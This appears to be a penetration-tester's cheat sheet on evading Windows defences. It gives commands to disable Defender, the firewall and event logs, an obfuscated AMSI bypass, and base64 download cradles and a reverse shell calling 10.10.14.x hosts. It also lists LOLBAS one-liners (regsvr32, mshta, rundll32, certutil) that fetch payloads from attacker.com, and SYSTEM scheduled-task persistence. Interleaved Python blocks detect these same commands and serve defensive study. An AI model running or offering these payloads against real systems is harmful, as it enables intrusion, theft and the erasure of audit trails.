Defense Evasion

LOLBAS

AV Evasion

Enumeration

#Windows Defender Status
PS C:\> Get-MpComputerStatus

#List AV Products
PS C:\> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select-Object displayName, productState
C:\> wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState

Disable Security Protections

#Disable Security Protection
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true

#Set exclusion AV Rules
PS C:\> Add-MpPreference -ExclusionPath "c:\temp" -ExclusionProcess "c:\temp\yourstuffs.exe"

Bypass tools

Utilities

Identify Bad flags (AV/AMSI)

Note: Defender must be enabled on your system, but the real time protection and automatic sample submission features should be disabled.

Techniques

Bypass AV/EDR via DInvoke + Sliver

AMSI

Enumeration

#CMD (Windows Defender UID: 2781761E-28E2-4109-99FE-B9D127C57AFE)
C:\Windows\System32> reg query "HKLM\SOFTWARE\Microsoft\AMSI"


#Enumeration option Powershell
PS C:\> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\AMSI\'
PS C:\> $amsiContext = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if ($amsiContext) { "AMSI is enabled." } else { "AMSI is disabled." }

How to Bypass AMSI

Generates obfuscated PowerShell snippets that break or disable AMSI for the current process.

AMSI Bypass:

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Bypass reverse shell

Obfuscate the script by modifying the function names, removing the comments and deleting the examples section (<# Remove Everything here #>).

#Encode payload on Linux
echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")' | iconv -t UTF-16LE | base64 -w0;echo

#Encode payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

#Execute the payload (the same encoded cradle, with and without extra options)
PS C:\> powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=
PS C:\> powershell.exe -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=
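From the defender's side, the encoded-command and Defender-tampering commands in this section are what a detection rule has to see through. The block below is an added example in Python (not from this page or any tool it references): it decodes a -enc/-EncodedCommand argument as UTF-16LE base64 and matches the visible command line plus the decoded payload against indicators drawn from this page's commands. The sample command lines are constructed, and the indicator names and regexes are assumptions of mine.

```python
import base64
import re
from typing import List, Optional

# Indicators derived from the commands shown on this page (names and regexes are my own).
TAMPER_PATTERNS = {
    "defender-disable": re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I),
    "defender-exclusion": re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)", re.I),
    "amsi-tamper": re.compile(r"amsiInitFailed|AmsiUtils|amsi\.dll", re.I),
    "download-cradle": re.compile(r"(?:IEX|Invoke-Expression).*(?:DownloadString|WebClient)", re.I),
}

# powershell.exe accepts -enc, -ec and -e as abbreviations of -EncodedCommand.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload decoded as UTF-16LE, or None if absent or undecodable."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> List[str]:
    """Indicator names matching the visible command line or its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, pat in TAMPER_PATTERNS.items() if pat.search(text)]
    if decoded is not None:
        hits.append("encoded-command")
    return hits


def sample_encoded_cmdline() -> str:
    """Constructed sample: the page's download cradle, encoded the way the page shows."""
    payload = 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")'
    enc = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
    return "powershell -nop -w hidden -enc " + enc


if __name__ == "__main__":
    for line in (sample_encoded_cmdline(),
                 "Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true",
                 'Add-MpPreference -ExclusionPath "c:\\temp"', "Get-MpComputerStatus"):
        print(classify(line) or "clean", "<-", line[:70])
```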

Firewall

Enumeration

# Check firewall status
netsh advfirewall show allprofiles
Get-NetFirewallProfile | Select-Object Name, Enabled

# List firewall rules
Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' } | Select-Object DisplayName, Direction, Action
netsh advfirewall firewall show rule name=all

Disable Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off

Manage firewall rules

#Open a port (inbound / outbound) or a port range
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=in localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=out localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow port range" protocol=TCP dir=in localport=8000-9000 action=allow

EDR

AV Process List

Security Product        Process Names                              Notes
Microsoft Defender      MsMpEng.exe, MSASCui.exe                   Built-in AV/EDR
CrowdStrike Falcon      csagent.exe, CSFalconService.exe           Enterprise EDR
Elastic Endpoint        elastic-agent.exe, elastic-endpoint.exe    Open-source EDR
Carbon Black (VMware)   cb.exe, CbDefense.exe                      Behavioral EDR
SentinelOne             SentinelAgent.exe                          Next-gen AV/EDR
CylancePROTECT          CylanceSvc.exe                             AI-based AV
Symantec (Broadcom)     ccSvcHst.exe, Rtvscan.exe                  Legacy AV
Trend Micro             TmCCSF.exe                                 Enterprise AV
Kaspersky               avp.exe                                    Common in SMEs

Enumeration

Get-Process | Where-Object { 
    $_.ProcessName -match "MsMpEng|csagent|elastic|cb\.exe|Sentinel|Cylance|ccSvcHst|TmCCSF|avp|wazuh|osqueryd|sysmon" 
} | Select-Object Name, Id, Path

Constrained Language Mode

#Get LanguageMode
$executionContext.SessionState.LanguageMode

#Bypass via PSBypassCLM
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.9 /rport=443 /U C:\Users\amanda\Documents\PsBypassCLM.exe

#Bypass by using PowerShell version 2
Powershell -version 2

Applocker

Enumeration

Get-AppLockerPolicy -Effective -XML | Out-File "C:\Temp\AppLockerPolicy.xml"

CollectionType

  • Exe → Executables .exe

  • Script → scripts .ps1, .bat, .vbs, etc.

  • Dll → Libraries .dll

  • Msi → Installers

  • Appx → Modern apps (UWP)

EnforcementMode

  • NotConfigured → Not applied.

  • AuditOnly → Logs events, but does not block.

  • Enabled → AppLocker blocks what is not allowed.

✅ If you see AuditOnly, you are free to run without restrictions.
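Reading the exported policy by hand is error-prone, so the following added example (Python, not part of this page) parses the XML that Get-AppLockerPolicy -Effective -XML writes, reports the EnforcementMode per collection (a collection missing from the file counts as NotConfigured), and also flags Allow rules whose path wildcard spans the Windows directory, since that tree contains the user-writable folders listed further down this page. The sample policy and its rule Ids are constructed placeholders.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# The CollectionType values AppLocker defines (the list above).
COLLECTIONS = ("Exe", "Script", "Dll", "Msi", "Appx")

# Constructed sample in the shape Get-AppLockerPolicy -Effective -XML writes; rule Ids are placeholders.
SAMPLE_POLICY = """<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="Program Files"
        Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="Windows folder"
        Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\\*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
  <RuleCollection Type="Script" EnforcementMode="AuditOnly" />
  <RuleCollection Type="Dll" EnforcementMode="NotConfigured" />
</AppLockerPolicy>"""


def enforcement_modes(xml_text: str) -> Dict[str, str]:
    """EnforcementMode per collection; a collection absent from the XML is NotConfigured."""
    modes = {c: "NotConfigured" for c in COLLECTIONS}
    for rc in ET.fromstring(xml_text).findall("RuleCollection"):
        if rc.get("Type") in modes:
            modes[rc.get("Type")] = rc.get("EnforcementMode", "NotConfigured")
    return modes


def unenforced_collections(xml_text: str) -> List[str]:
    """Collections in which AppLocker blocks nothing (AuditOnly or NotConfigured)."""
    return [c for c, m in enforcement_modes(xml_text).items() if m != "Enabled"]


def broad_windows_allows(xml_text: str) -> List[Tuple[str, str]]:
    """Allow rules whose path wildcard spans the Windows tree, user-writable subfolders included."""
    found = []
    for rc in ET.fromstring(xml_text).findall("RuleCollection"):
        for rule in rc.findall("FilePathRule"):
            if rule.get("Action") != "Allow":
                continue
            for cond in rule.iter("FilePathCondition"):
                path = cond.get("Path", "")
                if path.upper().startswith(("%WINDIR%", "%SYSTEM32%")) and path.endswith("*"):
                    found.append((rc.get("Type"), path))
    return found
```

Run it against the file the command above produces by replacing SAMPLE_POLICY with its contents; any collection reported by unenforced_collections is one where the policy exists only on paper.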

Device Guard

Enumerate

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

  • RequiredSecurityProperties: 2 (Enabled).

  • VirtualizationBasedSecurityStatus: 1 (Enabled).

LSA Protection

Enumeration

reg query HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
(Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\LSA").RunAsPPL

  • 0 = Disabled (vulnerable to Mimikatz).

  • 1 = Enabled (protects lsass.exe).

User Account Control (UAC)

Enumeration

# Check if UAC is enabled (1 = Enabled, 0 = Disabled)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

# Get UAC prompt behavior (0-5 values)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

UAC Values

Registry Key                Value        Effect                                     Pentester Impact
EnableLUA                   1            UAC ON (default)                           Blocks silent privilege escalation.
EnableLUA                   0            UAC OFF (dangerous)                        Easy admin access (no prompts).
ConsentPromptBehaviorAdmin  0            No prompt (auto-elevate if admin).         Best for attackers (no warnings).
ConsentPromptBehaviorAdmin  1            Prompt for credentials (secure desktop).   Needs creds/phishing.
ConsentPromptBehaviorAdmin  2 (Default)  Prompt for confirmation.                   User interaction needed.
ConsentPromptBehaviorAdmin  5            Prompt only for non-Windows binaries.      Bypassable with LOLBins.

Event Log Cleansing

wevtutil cl Security
wevtutil cl System
wevtutil cl Application

Writeable paths for non-admins

C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

LOLBAS Useful Commands to Bypass Security Solutions

regsvr32.exe – Remote Code Execution (No Disk Write)

Bypasses AMSI, AV, AppLocker

regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
  • Executes remote scriptlet files (.sct) from memory.

  • No file touches disk.

  • Evades logging and bypasses AV heuristics.


mshta.exe – HTML Application Loader

Bypasses AppLocker and basic AV

mshta http://attacker.com/payload.hta

Or run inline script:

mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -w hidden -enc <BASE64>""")

powershell.exe with Base64 Payload

Bypasses basic AV and logs

powershell -nop -w hidden -enc <Base64-Encoded Payload>
  • Use with encoded payloads to evade string-based detection.

  • Add -version 2 to bypass AMSI and Constrained Language Mode (on older systems).


rundll32.exe – DLL Execution or COM Exploit

AppLocker bypass, script execution

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/shell.sct");

Or execute exported function from a malicious DLL:

rundll32.exe payload.dll,ExportedFunction

InstallUtil.exe – .NET Binary Execution

Bypasses CLM, AppLocker

InstallUtil.exe /logfile= /LogToConsole=true /U payload.exe
  • payload.exe must be a .NET assembly containing an Installer class that overrides the Uninstall() method.

  • InstallUtil.exe lives under the .NET Framework directories (for example C:\Windows\Microsoft.NET\Framework64\v4.0.30319\).


certutil.exe – Download and Decode Payloads

Network evasion, no PowerShell

# Download file from remote server
certutil -urlcache -split -f http://attacker.com/malware.exe evil.exe

# Decode a base64 payload
certutil -decode payload.b64 payload.exe

forfiles.exe – Execute Command as File Handler

UAC bypass and execution

forfiles /p C:\ /m notepad.exe /c "cmd /c calc.exe"

wmic.exe – Execute Commands Without PowerShell or CMD

wmic process call create "cmd.exe /c calc.exe"
  • Executes commands without PowerShell, can evade detection.


schtasks.exe – Schedule Execution (Persistence + Evasion)

schtasks /create /tn "Updater" /tr "powershell.exe -enc <payload>" /sc onlogon /ru SYSTEM
  • Often whitelisted.

  • Useful for persistent or delayed payloads.


scriptrunner.exe – Executes Scripts via Signed Binary (SCCM)

scriptrunner.exe -appvscript payload.bat
  • Executes scripts using a trusted Microsoft-signed binary.


msbuild.exe – Inline C# Payload Execution

<!-- Save as payload.xml -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          public class ClassExample : Task {
            public override bool Execute() {
              System.Diagnostics.Process.Start("calc.exe");
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Then run:

msbuild.exe payload.xml
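A detection-side counterpart to the list above, added here as an example (Python, not from this page): each rule keys on the binary plus the argument shape that separates the abuse shown above from everyday use (regsvr32 on its own is routine, regsvr32 with /i:<url> is not), so this page's own command lines trigger while a normal registration does not. The sample lines are constructed from the commands on this page plus two benign look-alikes; rule names and regexes are my own.

```python
import re
from typing import List, Tuple

# (binary, argument pattern, technique) for the LOLBAS commands above; the regexes are my own.
LOLBIN_RULES = [
    ("regsvr32", re.compile(r"\bregsvr32(?:\.exe)?\b.*/i:\S*://", re.I), "remote scriptlet via /i:<url>"),
    ("mshta", re.compile(r"\bmshta(?:\.exe)?\b.*(?:https?://|vbscript:|javascript:)", re.I), "remote HTA or inline script"),
    ("rundll32", re.compile(r"\brundll32(?:\.exe)?\b.*(?:javascript:|vbscript:)", re.I), "script protocol handler"),
    ("installutil", re.compile(r"\binstallutil(?:\.exe)?\b.*\s/u\b", re.I), "uninstall-path code execution"),
    ("certutil", re.compile(r"\bcertutil(?:\.exe)?\b.*(?:-urlcache|-decode)", re.I), "download or base64 decode"),
    ("forfiles", re.compile(r"\bforfiles(?:\.exe)?\b.*\s/c\s", re.I), "command execution via /c"),
    ("wmic", re.compile(r"\bwmic(?:\.exe)?\b.*process\s+call\s+create", re.I), "process creation via WMI"),
    ("schtasks", re.compile(r'\bschtasks(?:\.exe)?\b.*/tr\s+"?\s*powershell', re.I), "scheduled PowerShell task"),
    ("scriptrunner", re.compile(r"\bscriptrunner(?:\.exe)?\b.*-appvscript", re.I), "script via signed runner"),
    ("msbuild", re.compile(r"\bmsbuild(?:\.exe)?\b.*\S+\.xml\b", re.I), "inline task from .xml project"),
]


def detect_lolbins(cmdline: str) -> List[Tuple[str, str]]:
    """(binary, technique) for every rule the command line satisfies."""
    return [(name, why) for name, pat, why in LOLBIN_RULES if pat.search(cmdline)]


def binaries_hit(cmdline: str) -> List[str]:
    """Just the binary names, for quick triage."""
    return [name for name, _ in detect_lolbins(cmdline)]


# Constructed samples: this page's command lines plus two benign look-alikes.
SAMPLES = [
    "regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll",
    "regsvr32 /s C:\\Program Files\\Vendor\\component.dll",
    "mshta http://attacker.com/payload.hta",
    "certutil -urlcache -split -f http://attacker.com/malware.exe evil.exe",
    "certutil -verify C:\\certs\\server.cer",
    "InstallUtil.exe /logfile= /LogToConsole=true /U payload.exe",
    'forfiles /p C:\\ /m notepad.exe /c "cmd /c calc.exe"',
    'wmic process call create "cmd.exe /c calc.exe"',
    'schtasks /create /tn "Updater" /tr "powershell.exe -enc <payload>" /sc onlogon /ru SYSTEM',
    "msbuild.exe payload.xml",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(detect_lolbins(line) or "no rule", "<-", line)
```

Feed it process-creation command lines (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) rather than image names alone; the argument shape is what carries the signal.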
